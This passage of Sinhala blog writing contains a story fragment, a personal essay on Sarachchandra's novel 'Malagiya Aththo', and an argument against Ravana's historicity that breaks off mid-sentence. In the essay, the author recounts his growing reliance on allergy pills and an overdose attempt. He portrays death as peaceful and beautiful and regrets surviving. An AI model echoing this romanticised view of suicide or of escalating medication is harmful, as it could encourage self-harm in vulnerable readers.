ඇය ඉදිරියේ සිටගෙන මම ප්‍රවෘත්තිය ඇයට කීවෙමි. “ඉනේ නැන්දෙ දැන් යන්න පුළුවනි” ඇයට සියල්ල කිව යුතුයැයි මම දෙගිඩියාවෙන් පසුවිමි. එහෙත් ඕ ඉක්මන් වූවාය. “මෙච්චර ඉක්මනට” අනතුරුව ඇය සිනාසෙමින් කතා කළාය. “හොදයි එහෙම නම් මම අද ඉදල හිරගෙදර විවේක ගන්නවා” මදක් පසුබෑ මම කතා කළෙමි. “කොහොමද දන්නේ ඉනේ නැන්දෙ?”

“ඊයෙ අහන්න ලැබුනා” ඇගේ මුහුණේ පසුතැවීමක් නැත. ගෙවී යන හැම මොහොතකම ඇගේ සිනා මුහුණ වර්ධනය විය.

ඉක්මනින්ම අවශ්‍ය ලියකියවිලිවල කටයුතු සම්පූර්ණ කෙරිණ. ඉනේ ලෙයිපාකලෙයි අනෙකුත් රෝගීන්ගෙන් සමුගත්තාය. තම දියණියගේ වාරුවෙන් ඇය පිටතට ආවාය. ඇය කෙළින්ම මා ඇමතුවාය. “ඉබුන්ගෝ ආයුබෝවන්”.

ඊට පිළිතුරු වශයෙන් මම කිසිවක් නොකීවෙමි. එහෙත් මම ඉනේ නැන්දා පසුපසින් තරමක් ඈතට වී ගමන් කළෙමි.

පොලිස් රථයක් රෝහලේ දොරටුව ඉදිරිපිට නතර කර ඇත. අනිත් රෝගීන් දෙදෙනා දැනටමත් දොරටුව ඉදිරියට පැමිණ සිටිති. ඉනේ ලෙයිපාකලෙයි පැමිණෙනු දුටු ඔව්හු ඇය එනතුරු නතර වූහ.

ඇය ඔවුන් සිටි පැත්තට යනවිට කොහෙන්දෝ සිට මතුවූ පිරිමි ළමයි දෙදෙනෙකු සහ ගැහැණු ළමයෙක් රෝගීන් තිදෙනාට මල්මාල පළදවා පිළිගත්හ. ඊළග මොහොතේ සටන් පාඨවල හඩ දෝංකාර දෙන්නට විය. විප්ලවයට ජයවේවා!

මගේ සිරුරේ හිරිගඩු පිපිණ. ශිෂ්‍ය‍යකුව සිටි කාලයේ සිටම පැවති බොහෝ කාලයක් යටපත්ව තිබූ මගේ හැගීම් නැවත පණ ගැන්විණි.

විප්ලවයට ජයවේවා!

වැල්.. මුල් සහ පෙති...

on Friday, 7 December 2012

උදේ ගෙදරින් එන්න පිටත්වෙද්දිම නහය ටිකක් දුක දෙන්න පටන් ගත්තා... සාමාන්‍යයෙන් මට වැස්සට තෙමුණට පිනී බෑවට සෙම් ඇවිස්සෙන ගති..නහය බුරුල් වීම වගේ දේවල් වෙන්නේ නැහැ. ඒත් දුවිල්ල... ඔව් දූවිල්ල තමා..පොඩ්ඩක් හරි දූවිල්ල වැදුනොත් සංසාරෙට ඕන නැහැ... ඇස් දෙක මුල නහයේ උඩ හරියෙන් හීනියට කිතියක් වගේ එහෙකින් පටන් අරං ටික වෙලාවක් යද්දී පටන් ගන්නවා ටැප් එක ඇරියා වගේ... ඔය හින්දා මං කාමරේ අස් කරද්දී.. මකුළු දැල් කඩද්දී වගේම දූවිල්ල ඇවිස්සෙන මොනයම්ම හෝ දේක නිරත වෙන්නේ දෙයියෝ බුදුන් සිහි කරගෙනම තමා... ඉස්සරනං ඔය වෙලාවට ලේන්සු දහයක් විතර තියා ගන්න ඕන... මං ජීවිතේ වැඩිම දුකක් වින්දේ ඔය ලෙඩෙන්...

ඒත් ඔහොම ඉද්දී තමා දවසක් අම්මා මට බෙහෙත් පෙත්තක් හදුන්වලා දුන්නේ... පුංචි කහපාට පෙත්තක්... අම්මා මට එයින් බාගයයි දුන්නේ... වැඩේ හරි ගියා.. මට ලොකු නිදි මතක් ආවා... ටික වෙලාවක් නිදා ගෙන ඇහැරුනත් හරි නහය බොහෝම වියළියි... අර තිබුන කරදරේ ඇත්තේම නැහැ.. පස්සේ මං ඒ පෙත්තට හුරු උනා... ලෙඩේ හැදීගෙනම එද්දී එයින් බාගයක්.. වැඩේ නිමයි... ඒත් කාලයක් යද්දී පෙති බාගේ මට මදි වගේ... ඒ හින්දා පෙත්තක් ගන්න පුරුදු උනා...

එහෙම කාලයක් යද්දී පෙත්තක ප්‍රමාණයත් අහන්නේ නැති ගානට ආවා... ඒ කාලේ වෙද්දී මට දවසකට එක පෙත්තක්වත් ගන්න වෙනවා..මොකද හැමදාම වගේ ඔය ලෙඩේ හැදෙන දවස්... වැඩ නොකර ඉන්න බැහැනේ... ඉතිං හැදීගෙන එද්දිම පෙත්තක් බීලා පැය කාලක් ඇල වෙලා ඉදලා වැඩ පටන් ගන්නවා...අන්න එයින් පස්සේ මට නිතර ‍ඔය ඇතිවෙන අසනීප තත්වය නැති උනා... සතියක් දෙකක් අල්ලලා හිටිනවා... ඔය වෙනකොට මේ ගැන අනතුරු අඟවපු අයත් හිටියා... ඇට දිරනවා... වැඩිය හුරු වෙන්න එපා... එක පාර ගොඩක් බිව්වොත් මැරෙනවා... මං ඒකත් පිළිගත්තා... කොහොමත් බෙහෙතක් කියන්නේ ඒ හැටි හොඳ දෙයක් වෙන්න බැහැනේ... අනික මට උවමනාවක් නැත්තං ගන්න ඕන නැහැනේ...

-----------------------------

මළ ගිය ඇත්තෝ... සරත්චන්ද්‍රයන්ගේ ප්‍රසිද්ධ කතාව... මං මුලින්ම කියෙව්වේ මට වයස අවුරුදු 13ක් විතර වෙද්දී... ඒ කියවලා එයින් ටික දවසකට පස්සේ ඒකෙම දෙවැනි කොටස උන මළවුන්ගේ අවුරුදු දාත් කියෙව්වා... හැබැයි මට ඒ කතාව ඒ හැටි මතකයක් තිබුනේ නැහැ.. ඒත් මං ආසම පොත් අතරටනං එකතු උනා... ලංකාවෙන් ජපානෙට ගිය සිවුරු හැරිය පුද්ගලයකුගේ කතාවක්... එහිදී හමුවන තරුනියක හා ගලා යන කතාවක්... ඒ හැටි හොඳ අවසානයක් නොතිබුන කතාවක් කියලා මං තේරුම් ගත්තට ලොකු මතකයක් තිබුනේ නැහැ...

ඊයේ පෙරේදා ආයේම මට හම්බ උනා "මළ ගිය ඇත්තෝ" ආයෙම කියෙව්වා... එදාට වඩා සිහි කල්පනාවෙන්... යම් තරමක අවබෝධයෙන්...

මේ වෙනකොට මාත් සිවුරු ඇරිය පුද්ගලයෙක්... දෙවොන්දරා සං යනුවෙන් හදුන්වපු කෙනාගේ නම මං හිතන්නේ දේවේන්ද්‍ර වෙන්න ඕන... සමහර විට පැවිදි නාමය දේවානන්ද වගේ තියෙන්නත් ඇති... කොහේ දේවානන්දද..? ලංකාවේ කොහේ හරි ගමක නමක් ඒ මුලට යෙදෙන්න ඇති... ඒකෙන් කමක්  නැහැ... ගිහියෙක් වෙලා ඉදලා පැවිදි උනාට පස්සේ අපේ මුල් කැපෙනවා... ඒ වෙනකල් තිබුන ගෙදර දොර එක්ක සම්බන්ධය හිතාගන්න බැරි තරමට ඈත් වෙනවා... ආයේ සිවුරු ඇරලා ගෙදර ආවත් අර කලින් තිබුන තරමට අපේ මුල් ගෙදරට..ගෙදර පරිසරයට.. නෑදෑ හිතවතුන්ට සම්බන්ධ වෙන්නේ නැහැ... නූල කැඩිලා ගිය සරුංගලයක් වගේ... එක අතකට බොහෝම නිදහස්.. අනිත් අතින් අයාලේ යන්න පුළුවන්...

සිවුරු ඇරලා ඇවිත් ඒ ගමන්ම කසාඳයක් බැඳ ගත්ත අයනං තමුන්ගේ මුල් ගෙදරට නැතත් තමන්ගේ අළුත් කුටුම්භය ඇතුලේ අළුතින් මුල් ඇඳ ගන්නවා... ඒත් එහෙම නොවුන අය ආතක් පාතක් නැතිව තමුන්ගේ මුල් කිසිම තැනක අදින්න දෙන්නේ නැතිව ඔහේ පාවෙනවා...

දෙවොන්දරාත් එහෙම තමුන්ගේ මුල් ගැලවුන කෙනෙක්... අවුරුදු 13 දී කියෙව්වට වඩා සිවුරට ගිහින් මුල් හිඳගෙන.. සිවුරෙන් ඇවිත් මුල් නැතිව පාවෙන කොට මිනිහව තේරුං ගන්න පහසුයි...  එක අතකින් බැඳීම් නැතිවීම හරි පහසුවක්... ඒ තුල තියෙන විඳීම මං හිතන්නේ නැහැ ලෝකේ කිසිම දේකින් විඳින්න පුළුවන් කියලා... හැබැයි එහෙම ඉද්දී මොන යම්ම හෝ හේතුවකින් අපිට බැඳීමක් ඇති උනොත් ඒක සාමාන්‍ය පුද්ගලයෙකුට ඇතිවන බැඳීමකට වඩා අසීරුයි... පිටතින් බලද්දී ඒක නිකං තීරණයක් ගන්න බැරිව දෙපැත්තට වැනෙන එකෙකුගේ ලක්ෂණ පෙන්නුම් කරනවා... මුලදී මං දෙවොන්දරා සංව දැක්කා වගේ... ඒත් ඒක ඇතුලට ගියාම තේරෙනවා ඇයි එහෙම වෙන්නේ කියන දේ...

ලෝක දෙකක් අතර මහ ගැටීමක්... එක ලෝකයක් ලස්සනයි... හිත් ඇඳගන්නවා... ඒත් ඒකට යටින් තියෙන්නේ මහා බැඳීම් ගොඩක්... අර මතුපිටින් තියෙන සිත් අලවන ස්වභාවයම දවසක තමුන්ට දුක් ගොන්නක් ගේනවා කියලා පැහැදිලිව පේනවා... බැඳීම්වල දුක මිසක් වෙන දෙයක් නැහැ කියන දේ වටහාගෙන ඉන්න කෙනෙකුට ඒක ලේසි නැහැ...

අනිත් ලෝකේ ඒ තරං ලස්සන නැහැ... තනිකම පාළුව වගේ දේවල් නිතරම තමා අවට සරනවා... ලෝකේ කෝටි ගණන් මිනිස්සු සත්තු හිටියත් එහෙම ලෝකවල ඉන්නේ එකම කෙනයි.. ඒ තමා විතරයි... කාත් කවුරුවත් නැතිව... ඇලීමක් බැඳීමක් නැතිව ජීවිතේ දවසක් ගෙවීම හිතන තරම්ම පහසු නැහැ. මනුස්ස සිත හැදිලා තියෙන්නේ නිතර බැදෙන්න...ඇලෙන්න... ඒකයි ස්වභාවය... එහෙම නොවුන තැන හුගක් අසීරුයි ජීවත් වීම... තත්පරයක් තත්පරයක් ගානේ කාලය ගෙවෙනවා කියන එක හොඳට දැනෙනවා... සමහර විට විනාඩියක් ගෙවා ගැනීමත් මහා වදයක් වෙන්න පුළුවන්... පිටින් කරදර නැහැ..ඒත් තමන්ගේ සිතත් එක්කම මහා යුද්ධයක් කරන්න ඕන... එහෙම ඇලෙන්න බැදෙන්න හිත නොදුවන තාක් කල් මේ ලෝකේ හරිම නිහඩයි..ශාන්තයි.. සැනසීමයි... හෙට මොකද වෙන්නේ කියන එක ලොකු ප්‍රශ්නයක් නෙවෙයි... මැරෙනවා කියන එක බියකරු දෙයක් නෙවෙයි...

කලින් කිව්ව ලස්සන ලෝකේ ඉද්දී මැරෙනවා කියන දේ අති භයංකරයි.. දාලා යන්න තියෙන දේවල් දැක්කම මරණය ගැන හිතන්නවත් හිතෙන්නේ නැහැ... තමන් හොයා සපයා ගත්ත ගේ දොර..වතු පිටි..යාන වාහන... තමුන්ගේ නෑදෑයෝ... විශේෂයෙන්ම දූ දරුවෝ.. එයාලා දාලා යන්න වෙනවා කියලා හිතෙනකොටත් හිතින් මැරි මැරි උපදින්න වෙනවා නිතර නිතර... ඒත් දෙවැනි ලෝකේ මරණය එයිට වඩා සුන්දරයි...  මරනින් මත්තට යන තැන ගැන හරි වගකීමක් තියෙනවනං ඒක තවත් සුන්දරයි... ඒත් කරුමෙට වගේ ඒ කාරනේ දැන ගන්න තරං හිත දියුණු නොකරපු කෙනෙකුට සර්ව සම්පූර්ණත්වයකින් මැරෙන්න වෙන්නේ නැහැ.. ඒත් එයින් කියැවෙන්නේ නැහැ මරණය නරකයි කියලා... එහෙම තත්වයකින් උනත් මරණය අර කලින් ලෝකෙට වඩා සිය දහස්ගුණයකින් සුන්දරව පේනවා...

----------------------------

දෙවොන්දරා සං එක මොහොතකදී තමා සන්තකව තියෙන නිදි බේත් ගුලි වගයක් ගිලිනවා... මරණය අපේක්ෂාවෙන්... මට ඔය කෑල්ල මතක තිබුනේ නැහැ... ඒත් මමත් එක් වතාවකදී මං කලින් කියපු බේත් පෙති වලින් ඒ වෙනකොට මං ගාව තිබුණ ප්‍රමාණය.. විසි ගානක් ගිල දානවා... ඒත් මරණය අපේක්ෂාවෙන්...

අපි දෙන්නම ඒ දේ කලේ එකම පසුබිමක් මතද කියන්න මට තේරෙන්නේ නැහැ.. හැබැයි ඒ වෙද්දී මං මට කරන්න පුළුවන් උපරිමය කරලා තිබුනේ... ඒ මොහොතේ මරණය මා කරා ආවනං එයින් පසුව මගේ අතින් සිද්ධ වෙන්න තිබුන වැරදි හුගාක් නවතිනවා... ඇත්තටම ඒක පිරිසිදු මොහොතක්... කාටවත් වරදක් නැති.. මට වරදක් කල අයටත් මුළු හිතින්ම සමාව දීපු...  අමුතුවෙන් දිනාගන්න දෙයක් නැති... ආයේ කිසිම දෙයක් ඕනත් නැති.. ඒ වගේම තව දුරටත් කියලා කරන්න කිසිත් නැති මොහොතක්... ජීවීතේ ඊ ළග තත්පරේ මට උවමනා නැති මොහොතක්... මිනිහෙකුට මැරෙන්න එහෙම මොහොතක් ලේසියෙන් ලැබෙන්නේ නැහැ...

ඒත් දින එකහාමාරකට පස්සේ මම නැගිටිනවා වලංගු නැති අතපයත් එක්ක... ඒ තත්වයෙන් මිදෙන්න දවසක් විතර ගියා... එයින් පස්සේ මම ආයෙත් ජීවත් වෙනවා... හැබැයි වැරදි ගොඩක් එක්ක... බාගෙට කරපු වැඩ ගොන්නකුත් එක්ක... කරනවනං තව ඕන තරං දේ තියාගෙන... නොකරපු එහෙත් කල යුතු දේ තියාගෙන... කිසිම ආකාරයකින් සම්පූර්ණයි කියලා කියනන් බැරි ජීවිතයක් ගෙවමින් මම දැන් ජීවත් වෙනවා... පොඩි වෙනසකුත් එක්ක.. ඒ තමා දැන් මට අර අසනීප ගතිවලට එක පෙත්තක් මදි වීම.. දැන් මාත්‍රාව පෙති දෙකයි...

මළ ගිය ඇත්තෝ බලාගෙන යද්දී මේ අවස්ථාව දැකපු වෙලේ තමා කල්පනාවට ආවේ මට ‍මේ සිද්දිය හරියටම මතක නැති උනත් ඒක කොයිම ආකාරයකින් හරි මට බලපෑවද කියන දේ... සමහර විට ඒක එහෙම වෙන්න ඇති... නොවෙන්නත් ඇති... ඒත් ඒ කතාවෙයි මේ කතාවෙයි දෙකේදීම ‍වෙච්ච දේට මං කැමති නැහැ... ඔහුට ඔහුගේ අවසානයත්..මට මගේ අවසානයත් ඒ මොහොතේදී හිමි උනානං අපි දෙන්නටම ඒක සැනසීමක් වෙයි කියලා විතරක් මං දන්නවා...

මොකද එයින් පස්සේත් ඔහු සතුටින් හිටියේ නැහැ... එක එක දේ නිසා දිගින් දිගටම විදෙව්වා... එතකොට මම..?

අද වෙනකොට මමත් මුල් නැති ගහක් වගේ ඔහේ පාවෙනවා... එහෙ මෙහෙ තියෙන අහක යන වැල් ඉදහිට මගේ ඇගේ දැවටෙනවා.. සමහර විට මං විසින්ම ඒවා අස්සෙන් ගිහින් පටලව ගන්නවා.. ඒත් වැල් කියන්නේ මුල් නෙවෙයි කියලා ටික දවසක් යද්දී තේරෙනවා... සමහර විට වැල් විසින්ම ඒ දේ අපිට තේරුම් කරවලා දෙනවා... අපි වැල්වලින් මුල් හොයන්න යෑම විහිළුවක්... අවසානෙදී වෙන්නේ වැල් අතාරින්න වෙන එකයි... එතැන් පටන් වැලුත් නැති මුලුත් නැති ජීවිතේ ගෙවීම ඒ හැටිම පහසු වෙන්නේ නැහැ... අපිටත් නොදැනී අපි අර  හිටිය නිහඩ පාළු නිස්කලංක ලෝකයෙන් අහකට පැනලා... ඒත් අර පිටතින් ලස්සන ලෝකේට පනින්න තරං ඒ පනින පිම්ම දිගු වෙලත් නැහැ... එතකොට වෙන්නේ  දෙලොවටම නැති ජීවිතයක් ගෙවන්න...

---------------------------------

උදේම අදත් බෙහෙත් පෙති දෙකේ මාත්‍රාව ගන්න උනා... ඒකට ලෙඩේ හොඳ වෙනවා වගේම හිත මත් වෙලා යනවා... බලාගත්ත අතේ බලාගෙන ඔහේ හිටියැකි.... ඒ අත‍රේ ලියන්න ගත්තම ඔහේ ලියැවෙනවා... ලිව්වේ මොනවද කියලා ඉතිං බලන්න වෙන්නේ බෙහෙතේ පවර් එක ගියාට පස්සේ තමා...

මිය ගියාට පස්සේ මොටද
ආයෙත් අවුරුදු එන්නේ...
මිය ගිය වුන් මිය ගියාවේ
නැහැ ආයෙත් මෙහි එන්නේ...

රාවණා



රාවණාගේ ලංකාපුර රාජධානිය, හෙළ, අසුර සංස්‌කෘතික අධිරාජ්‍ය වැනි වරදවා වටහා ගත් සාහිත්‍යම කරුණු බලෙන් ඉතිහාස ගතකරවීමේ ආශාවකින් පෙළෙන කිසිවෙකු ඒ සඳහා ශාස්‌ත්‍රීය පදනමකින් කරුණු එළිදක්‌වා නැත. ඇමරිකානුවා පිළිබඳ බිය මුසු ගෞරවයකින් "නූතන ඇමරිකානු පර්යේෂණ වල තොරතුරු බව කියමින් මූලාශ නැති ප්‍රවාද මගින් රාවණා ඓතිහාසික චරිතයක්‌ කිරීමට ඇතැමුන් තැත් කරයි. ඒ මහතා රාවණා පුවත සනාත කරන්නේ ඇමරිකානු මානසික වහල් භාවයේ පිහිටෙන් මිස ශාස්‌ත්‍රීය තොරතුරු වලින් නොවේ. අටුවාචාරීන් - වංශකතා රචකයන් මිෂනාරීන්ගේ තත්ත්වයට දමා මහින්දාගමනයේ පිවිතුරු ගෞරවය කෙළෙසා දැමීමට රාවණා පාවිච්චි කිරීමද ඔවුුගේ සැබෑ ව්‍යාපෘතියයි. ඒ සඳහා බටහිර රටක සිට ඔහුගේ ඥති පුත්‍රයකු ද ලිපි මගින් හවුල් වෙයි. හෙළ - අසුර නමැති ලංකාව කේන්ද්‍රකරගත් මහා අධිරාජ්‍යයක තොරතුරු වැනසූ- වසං කළ (මධ්‍යතන යුගයේ පූජකවරුන්ගේ තත්ත්වයට) පිරිසක්‌ ලෙස ශ්‍රී ලංකාවේ වංශකතා කරුවන් හඳුන්වා බෞද්ධ ශිෂ්ඨාචාරයේ නිර්මාතෘවරු වෛරයට ලක්‌කිරීම ඔවුන්ගේ ව්‍යපෘතිය බව පෙනෙයි.

නමුත් පැහැදිලිවම හෙළ - අසුර ලෙස ජනතාවක්‌ අතීතයේ කිසිම දිනක මෙරට සිටියේ නැතිබව කීමට ප්‍රමාණවත් සාක්‍ෂි ඇත. "රාමායනය" ආර්යයන්ගේ සාහිත්‍ය කෘතියකි. ආර්ය ජනයා ක්‍රි. පූ. 1500 ආසන්න කාලයේ දී ඉංදියාවට ඇතුල් වූ සංක්‍රමණ ජනතාවකි. (බලන්න, 2009, නොවැ. 18 දින ආර්යයන්ගේ මුල් බිම සොයා යැම, බදාදා අතිරේකය.)

ආර්ය ජනයා ග්‍රීසියේ සහ ඉංදියාවේ ව්‍යාප්ත වූ පසු ඔවුන්ගේ ගෝත්‍රයේ වීරයන් පිළිබඳ පද බඳින ලද වීරකාව්‍යද ජනප්‍රිය කළේය. හෝමර්ගේ "ඉලියඩ් හා ඔඩිසි" වීරකාව්‍ය දෙකක්‌ "මහා භාරතය හා රාමායනයත් කතා සාරය අතින් ඉඳුරා එක සමානය. මේ සමානකමට හේතුව වීරකතා යුගලම ආර්යන්ගේ එකම කතාවකින් ගොතනලද නිසාය.

"රාමායනය" ලියූ හින්දුන්ගේ සහ "ඔඩිසි ලියූ ග්‍රීකවරුන්ගේ අතීත මුතුන් මිත්තන් එම රටවල් වලට (ඉන්දියාවට - ග්‍රීසියට) සංක්‍රමණය වීමට පෙර එකම ජනතාවක්‌ ලෙස උතුරු සුළු ආසියානු ප්‍රදේශයක ජීවත් වී තිබේ. එලෙස ජීවත් වූ තැන මාතෘ ආර්ය භූමිය ලෙස හඳුන්වයි. එම මාතෘ ආර්ය භූමියේ දී ගෙතූ වීරකතා දෙකකින් "රාමායණය" සහ "මහාභාරතය" සකස්‌ කරගෙන ඇත. (රාවණා සහ වීරකාව්‍ය ඉතිහාසය, 2009 සැප්- 23 බදාදා අතිරේකය" බලන්න)

එම නිසා රාමායනයෙන් නිරූපනය වන්නේ ඉන්දීය ඉතිහාසය නොව මාතෘ ආර්ය භූමියේ වීරකතා ප්‍රපංචයකි. "වාල්මිකි" එය ඉන්දියානුකරණයට ලක්‌කර ඇත. එම නිසා ලංකාවේ රාවණා රාජධානියක්‌ සෙවීම කෙසෙල් ගසක පතුරු ගලවා අරටුව සෙවීම වැනි ක්‍රියාවකි.

මහින්දාගමනයෙන් පසුව ලියූ ශිලා ලිපිවල ඇති "රාවණා" "රාමා" ආදී සාමාන්‍ය මිනිසුන්ගේ නම් රාමායණය සනාථ කිරීමට යොදා ගැනීම මොවුන් පුරාවිද්‍යා සාධක සපයන ක්‍රමයයි. රාවණා, බුදු දහමට අනුග්‍රහය දැක්‌වූ බව රාමායනයේ කිසිදු තැනක නැත. රාමායනය ලියවී ඇත්තේද බුද්ධ කාලයට සියවස්‌ ගණනාවක්‌ ඈතදී බව එයින් නිරූපනය වන රාජ්‍යවල සහ රජවරුන්ගේ නම්වලින් පෙනෙයි. තවද රාමායනයෙ ඊට වඩා පැරණි මහා භාරතයේ අතුරු කතාවකි. මහා භාරතයෙන් නිරූපනය වන්නේ ක්‍රි. පූ. 800 ආසන්න කාලයකි. ඊට හේතුව ක්‍රි. පූ. 6 වන සියවසෙන් මෙහා ඉතිහාසයට අයත් පාටලීපුත්‍රය ඇතුලු සොළොස්‌ මහා ජනපද වල විස්‌තර සහ ඒවායේ රජ පරම්පරා, කිසිවක්‌ මහා භාරතයේ සඳහන්ව නැත. මේ නිසා මහා භාරතය සහ එහි අන්තර්ගත රාමායනය ක්‍රි. පූ. 6 වන සියවසට වඩා ශතවර්ෂ ගණනාවක්‌ ඈතකදී පද්‍යයට නංවා ඇති බව නිසැකය. එබැවින් ක්‍රි. පූ. 800 ආසන්න යුගයකදී මහා භාරතය පද්‍යට නංවා ඇතැයි සැළකේ. මේ නිසා මහා භාරතය ලියූ යුගයට වඩා සියවස්‌ දෙකකට පසුව ජීවත් වූ බුදුන් වහන්සේට හෝ භික්‍ෂූන්ට රාවණා රජු ලෙන් පූජා කළ බව කියන සූරිය ගුණසේකර මහතාගේ අදහස මොළේ කළඳක්‌ හෝ ඇති අයෙකු පිළිගන්නේ නැත.

ඉතිහාසයේ මොනම ක්‍රමයකින් හෝ යක්‍ෂ හෝ හෙළ නැමති ජනතාවක්‌ ලංකාවේ නොසිටි බව කිව හැකිය. මෙරට යක්‍ෂ හෝ අසුර රාජධානියක්‌ තිබුනේ නම් වීභීෂණ ගේ යුගයෙන් පසු එය අඛණ්‌ඩව පැවතිය යුතුය.

මෙරට ස්‌වාධීනව උපන් උසස්‌ සංස්‌කෘතියක්‌, ශිෂ්ඨාචාරයක්‌ තිබුණ බවට හෙළ හවුලේ ඇතැම් වියතුන් අදහස්‌ කරති. රාමායනය සත්‍ය ඉතිහාස සිදුවීමක්‌ ලෙසත් ඔවුහු විශ්වාස කරති. සූරිය ගුණසේකර මහතා වැනි ඇතැම් විද්වතුන් ලෝකයටම ශිෂ්ඨාචාර සහ සංස්‌කෘතීන් බෙදා දුන් හෙලයන්ගේ ආදි ශිෂ්ඨාචාරයක්‌ පිළිබඳව මතයක්‌ පවා ඉදිරිපත් කරයි. මෙය තේරුම් ගැනීමට ආවේගවලින්ද මමත්වයෙන්ද බැහැරව, ලෝකය පුරා සංස්‌කෘතීන් - ශිෂ්ඨාචාර පහළවීමට හේතු වූ කරුණුවල පොදු සමානකම් වෙන් කරගනිමු. අනතුරුව ඒවා ශ්‍රී ලංකාවට ආදේශ කළ හැකිද යන්න බැලිය යුතුය. එවිට අඩුතරමින් මහා සංස්‌කෘතියක්‌ ඇති වීමට හේතුවන පසුබිමක්‌ මෙරට තිබුණු නොතිබුන බව හෝ උපකල්පනය කළ හැකිය. ලොව පැරණිම මහා ශිෂ්ඨාචාර පිහිටි භූමිවල පිහිටීම හා භෞතික සම්පත් පදනම් කරගෙන ඒවා ඇති වූයේ යම්සේද, ශ්‍රී ලංකාව තුළද ඒවාට සමාන ශිෂ්ඨාචාරයක්‌ ඇති වීමට තුඩුදෙන භෞතික සම්පත් සහ භූගෝලීය පිහිටීමක්‌ තිබේද? විශේෂයෙන් භූගෝලීය - දේශගුණික සහ ආර්ථික පදනමේ පොදු සමානකම් ශිෂ්ඨාචාර ඇති වීමට පොදුවේ බලපායි. ලොව පැරණිම මහා ශිෂ්ඨාචාර හතරවූ මිසර, බැබිලෝනියා, හොවැංහෝ, හරප්පා ශිෂ්ඨාචාර පහළ වූයේ මහාගංඟාධාරවලින් සමන්විත විශාල ගොඩබිම්වල මිස දූපත්වල නොවේ. නිරන්තරව එම භූමි වලට අලුත් අලුත් ජන සංක්‍රමණ සිදු වෙයි. එය හේතු කොට ගෙන නව අදහස්‌ එකතු වෙයි. එම නිම්නවල ධාන්‍යය සරුවට වැඩී, අතිරික්‌ත ධාන්‍ය එකතුවිය. ධාන්‍ය සරුවට වැඩෙන සමභූමියේ ජනගහනයද ශීඝ්‍රයෙන් වැඩිවෙයි. එවිට ඇතිවන ආගමික සංස්‌කෘතික ගැටලු නව සංකල්ප නිර්මාණයට හේතුවෙයි. එම නව සංකල්ප අවට දූපත් සහ කඳුකර ප්‍රදේශ වෙත ප්‍රවාහනය වෙයි. ශ්‍රී ලංකාවෙහි ස්‌භාවික පිහිටීම අනුව, මහා ගොඩබිම් සියල්ලෙන් දුරස්‌ථ හුදෙකලා දූපතකි.

මෙබඳු හුදෙකළා දූපත් වල ස්‌වාධීන මහා ශිෂ්ඨාචාරයක්‌ ගොඩ නැගීමට අවශ්‍ය සංකල්ප දියුණු වන පරිසරයක්‌ ඇති නොවේ. මෙම පිහිටීම බුද්ධිමය සංකල්ප දියුණු වීමේ ඉඩකඩ ස්‌වාභාවිකවම අඩු කරයි. ලෝකය පුරා ලංකාව වැනි දූපත් වල සංස්‌කෘතීන් - ශිෂ්ඨාචාර පහළවීමට තුඩුදුන් හේතුව වූ අසල්වැසි මහා ගංඟාධාරවල ඇසුරයි. ක්‍රීට්‌ දිවයින මේ සඳහා ඇති හොඳම උදාහරණයකි. ශ්‍රී ලංකාවේ ස්‌වාභාවික පිහිටීම මිසර , බැබිලෝනියා, හොවැංහෝ, හරප්පා වැනි ශිෂ්ඨාචාරවලට පදනම් වූ භූගෝලීය තත්ත්වය හා ගැලපෙන්නේද නැත. නමුත් ප්‍රමාණවත් පුරාවිද්‍යාත්මක සාධක ඇතිනම් මේ නොගැලපීම නොසැලකිය හැකිය. අවාසනාවකට මෙන් මේ දක්‌වා එවැනි සාධක හමු වී නැත. රාවණා යුගයේ පුරාවිද්‍යාත්මක ස්‌ථාන ලෙස ඉදිරිපත් කරන සාධක කනගාටුදායක ලෙස අනුරාධපුර යුගයට හෝ ඊටත් පසුකාලයට අයත් ඒවාය.

ක්‍රි.පූ. 10000 වන විටත් ශ්‍රී ලංකාව හුදෙකලා දූපතකි. මහාශිෂ්ඨාචාර හතරම විනාශ වී අවසන්ය. රාමායනය රචනා කර ඇත්තේද මහාශිෂ්ඨාචාර හතරම විනාශ වූවාට සියවස්‌ ගණනකට පසුවයි. එබැවින් රාමායනයේ චරිත සහ මහාශිෂ්ඨාචාර අඩුතරමින් සමකාලීනවත් නැත. ක්‍රි. පූ. 900 අයත් ශ්‍රී ලංකාවෙහි ඇත්තේ මහාශිලා යුගයේ අපර භාගයට අයත් සංස්‌කෘතියකි. බලංගොඩ මානවයාගේ සිට ක්‍රි. පූ. 900 වන තෙක්‌ අඩුතරමින් සංවිධානාත්මක මානව ජනාවාස පිළිබඳ සාධක හෝ ශ්‍රී ලංකාවේ නැත. මෙම තත්ත්වය රාවණාගේ ඓතිහාසික බව සනාථ නොකිරීමට ඇති ප්‍රබලම සාධකයකි. ඇතැම් විද්වතුන් ලෝකයටම ශිෂ්ඨාචාර සහ සංස්‌කෘතීන් බෙදා දුන් හෙළයන්ගේ ශිෂ්ඨාචාරය සඳහා සීතා එළිය, වාරියපොල වැනි ප්‍රදේශ පවා සඳහන් කරයි. ක්‍රි.පූ. 900 තෙක්‌ ශ්‍රී ලංකාවේ මානව ජනාවාස වල තත්ත්වය පෙන්වා දුන් විට ඔවුන් රාවණා රාජධානිය මුහුදට ගිලා බැස ඇති බව කියා ප්‍රශ්නය මඟ හැර යයි. මින් පෙනෙන්නේ හෙළ රාජධානිය පිළිබඳව කතාකරන විද්වතුන් කල් තබා සකස්‌ කරගත් නිගමනයක්‌ සනාථ කිරීමට පදනම් විරහිත සාධක ඉදිරිපත් කරන බවයි. ක්‍රි. පූ. තුන්වන සියවසේ සිට ක්‍රි. ව පළවන සියවස තෙක්‌ එක්‌දහස්‌ පන්සීයකට අධික ශිලා ලිපි ලංකාව පුරා පුළුල් ව්‍යාප්තියක්‌ සහිතව පැතිරී ඇත. ඒවායේ නොයෙක්‌ ජාතීන් ගණනාවකගේ නම් සඳහන්ය. ඒවා නම්, ආර්ය (AY - IC No 550), කාම්බෝජ (Kambojhiya IC . 553) දෙමළ (Dameda - IC . 356), පාණ්‌ඩ්‍ය (Pandu Vasa - IC . 1215), බ්‍රාහ්මණ (Bamana - IC . 124), මෞර්ය (Meraya - IC. 783), වඡ්ජි (Ojhaka - IC . 642), මුරුඩ (Muruda - IC.) යන ජාතීන්ය රාමායනයේ සටහන් අනුව රාවණා රාක්‍ෂ ජාතිකයෙකි. මීට අමතරව වංශකතාවල යක්‍ෂ, නාග, දේව, රාක්‍ෂ ලෙස වෙනම ශ්‍රී ලංකාව පාලනය කළ ජනවර්ග හතරක්‌ පිළිබඳ ඇතැමුන් කතා කළත් කිසිම ශිලා ලේඛනයක එබඳු ජනවර්ග හතරක්‌ තහවුරු 